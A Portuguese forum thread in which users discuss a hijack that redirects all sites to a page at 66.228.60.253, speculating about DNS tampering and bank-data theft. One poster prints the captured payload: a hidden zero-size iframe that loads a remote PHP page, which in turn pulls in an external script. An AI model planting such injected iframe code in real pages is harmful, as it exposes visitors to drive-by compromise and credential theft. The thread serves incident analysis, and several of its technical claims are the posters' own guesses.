http://66.228.60.253/x.html Aparecendo em todos os sites http

Re: http://66.228.60.253/x.html Aparecendo em todos os sites http

Amigo, A OI tem Backbone (internacional), são cabos submarinos da Globenet, subsidiária da Oi. A Globenet possui um duplo anel submarino com 22 mil km de extensão, ligando o Brasil aos EUA, passando pela Venezuela, Colômbia e Bermudas.

Re: http://66.228.60.253/x.html Aparecendo em todos os sites http

Também estou com esse problema, começou por volta das 20h00.

Com toda certeza é um ataque hacker, provavelmente ação para roubo de informações bancarias.
Tenha cuidado com o site que você acessa, evite acessar o site do seu banco até o problema ser resolvido, aparentemente isso já tinha acontecido mês passado(não tão grande quanto dessa vez) e segundo um técnico da lista [caiu] provavelmente eram hackers.

Pra quem tiver interesse:
https://eng.registro.br/pipermail/gt...ay/055305.html
https://eng.registro.br/pipermail/ca...st/044414.html

Re: http://66.228.60.253/x.html Aparecendo em todos os sites http

Galera, perdoem a minha ignorância. Mas se o ataque é no backbone, trocando o servidor DNS, não era pra assim que digitasse o domínio, retornasse diretamente o conteúdo diferente?

E pq só existe o redirecionamento, após a página carregar? Inclusive se apertar ESC bem rápido, é possível ver a página original. Ou seja, é como a alteração fosse feita na própria máquina e não na nuvem.

Re: http://66.228.60.253/x.html Aparecendo em todos os sites http

Citação:

Postado originalmente por anderson631

Galera, perdoem a minha ignorância. Mas se o ataque é no backbone, trocando o servidor DNS, não era pra assim que digitasse o domínio, retornasse diretamente o conteúdo diferente?

E pq só existe o redirecionamento, após a página carregar? Inclusive se apertar ESC bem rápido, é possível ver a página original. Ou seja, é como a alteração fosse feita na própria máquina e não na nuvem.

Agora que você mencionou isso, é verdade... O redirecionamento é feito um pouco depois de você abrir a pagina, estranho.

Re: http://66.228.60.253/x.html Aparecendo em todos os sites http

Citação:

Postado originalmente por anderson631

Galera, perdoem a minha ignorância. Mas se o ataque é no backbone, trocando o servidor DNS, não era pra assim que digitasse o domínio, retornasse diretamente o conteúdo diferente?

E pq só existe o redirecionamento, após a página carregar? Inclusive se apertar ESC bem rápido, é possível ver a página original. Ou seja, é como a alteração fosse feita na própria máquina e não na nuvem.

Consegui descobrir algo... O DNS alterado "parece" ter sido do endereço do "http://www.google-analytics.com/analytics.js". Logo, 99% dos sites deve tê-lo. E oq retornava era um JS que alterava o conteúdo da página por um iframe, como eu já tinha mencionado.
Ainda não confirmado se foi totalmente assim.

1 Anexo(s)

Na verdade isso é um java script que ta encoded

cat x.html
<iframe style="position: absolute; left: 0px; top: 0px; width: 0px; height: 0px; z-index: 0;" name="analytics" src="http://66.228.60.253/live.php" frameborder="0" width="0" height="0"></iframe><meta charset="utf-8">

cat live.php
68281<html> <head> <script src="1.js"> </script> </head><body></body></html>

eu tambem baixei o 1.js

e estou colocando em anexo caso alguem esteja curioso